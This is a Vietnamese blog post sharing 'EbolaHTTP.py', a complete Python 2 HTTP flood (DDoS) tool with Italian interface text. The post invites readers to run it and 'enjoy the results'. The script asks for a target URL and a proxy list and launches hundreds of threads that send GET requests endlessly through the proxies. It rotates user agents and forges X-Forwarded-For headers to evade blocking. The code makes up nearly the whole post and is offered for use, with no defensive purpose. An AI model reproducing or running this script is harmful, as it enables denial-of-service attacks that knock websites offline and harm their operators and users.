EbolaHTTP
Code ddos Ebolahttp.py, một tool ddos cực mạnh của GUZMAN96.
Các bạn save dưới dạng Ebolahttp.py rồi chạy trên Koding nhé, chờ 30s và tận hưởng kết quả 😈
Sự dụng lệnh dưới đây, để chạy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
|
# Embedded file name: EbolaHTTP.py
import random
import socket
import threading
import time
print ''
print ' ###############################################'
print ' # EBOLA HTTP v. 1.5 #'
print ' ###############################################'
print ' # PRIMA FAI IL LOGIN #'
print ' ###############################################'
print ''
print ''
class Secure:
logbase = {'ebola': 'ebola'}
logged = False
invalid = False
def login(self, user, passw):
self.logged = False
self.invalid = False
try:
if self.logbase[user] == passw:
self.logged = True
else:
self.logged = False
except:
self.logged = False
self.invalid = True
def __init__(self):
while self.logged == False:
user = raw_input('Username: ')
passw = raw_input('Password: ')
self.login(user, passw)
if self.invalid == True:
print 'Nome Errato'
elif self.logged == False:
print 'Nome O Password Errati'
elif self.logged == True:
print 'Benvenuto, %s' % user
S = Secure()
userAgents = ['Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00',
'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14',
'Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02',
'Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00',
'Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)',
'HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27']
def randomIp():
random.seed()
result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
return result
def randomIpList():
random.seed()
res = ''
for ip in xrange(random.randint(2, 8)):
res = res + randomIp() + ', '
return res[0:len(res) - 2]
def randomUserAgent():
return random.choice(userAgents)
class attacco(threading.Thread):
def run(self):
current = x
if current < len(listaproxy):
proxy = listaproxy[current].split(':')
else:
proxy = random.choice(listaproxy).split(':')
useragent = 'User-Agent: ' + randomUserAgent() + '\r\n'
forward = 'X-Forwarded-For: ' + randomIpList() + '\r\n'
httprequest = get_host + useragent + accept + forward + connection + '\r\n'
while nload:
time.sleep(1)
while 1:
try:
a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
a.connect((proxy[0], int(proxy[1])))
a.send(httprequest)
try:
for i in xrange(3):
a.send(httprequest)
except:
tts = 1
except:
proxy = random.choice(listaproxy).split(':')
print ''
print ''
print ' ###############################################'
print ' # MADE BY GUZMAN96 #'
print ' # EBOLA HTTP v. 1.5 #'
print ' ###############################################'
print ' # USARE SU UN VPS / DEDICATO #'
print ' ###############################################'
print ' # SKYPE: OOATOMICZOO #'
print ' ###############################################'
print ' # TS3: TS3.DRCCOMMUNITY.NET #'
print ' ###############################################'
print ' # FORUM: FORUM.DRCCOMMUNITY.NET #'
print ' ###############################################'
print ''
print ''
url = raw_input('Sito (Es http://sito.com/) : ')
host_url = url.replace('http://', '').replace('https://', '').split('/')[0]
in_file = open(raw_input('Lista proxy (Es: proxy.txt) : '), 'r')
proxyf = in_file.read()
in_file.close()
listaproxy = proxyf.split('\n')
thread = input('Pacchetti (Consigliati: 800): ')
get_host = 'GET ' + url + ' HTTP/1.1\r\nHost: ' + host_url + '\r\n'
accept = 'Accept-Encoding: gzip, deflate\r\n'
connection = 'Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n'
nload = 1
x = 0
for x in xrange(thread):
attacco().start()
time.sleep(0.003)
print '' + str(x) + ' Pacchetti Partiti!'
print 'Attacco Iniziato...'
nload = 0
while not nload:
time.sleep(1)
|
EbolaHTTP
Reviewed by Unknown
on
11:42 PM
Rating:
No comments: